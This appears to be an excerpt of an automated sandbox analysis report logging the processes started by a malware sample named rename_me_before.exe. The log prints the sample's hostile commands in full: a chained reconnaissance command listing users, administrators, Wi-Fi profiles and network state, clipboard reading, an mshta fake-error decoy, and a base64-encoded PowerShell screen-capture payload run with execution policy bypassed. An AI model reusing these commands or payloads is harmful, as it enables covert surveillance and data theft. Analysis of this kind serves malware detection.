            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iqddoona\iqddoona.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES71B8.tmp" "c:\Users\user\AppData\Local\Temp\iqddoona\CSCE5D39DCC87804C2589D261464B53262.TMP"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
            Source: C:\Users\user\Desktop\rename_me_before.exeCode function: 0_2_00007FF640508880 cpuid 0_2_00007FF640508880
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\aiohttp VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\attrs-23.2.0.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\cryptography-42.0.8.dist-info VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\rename_me_before.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI13962\base_library.zip VolumeInformationJump to behavior
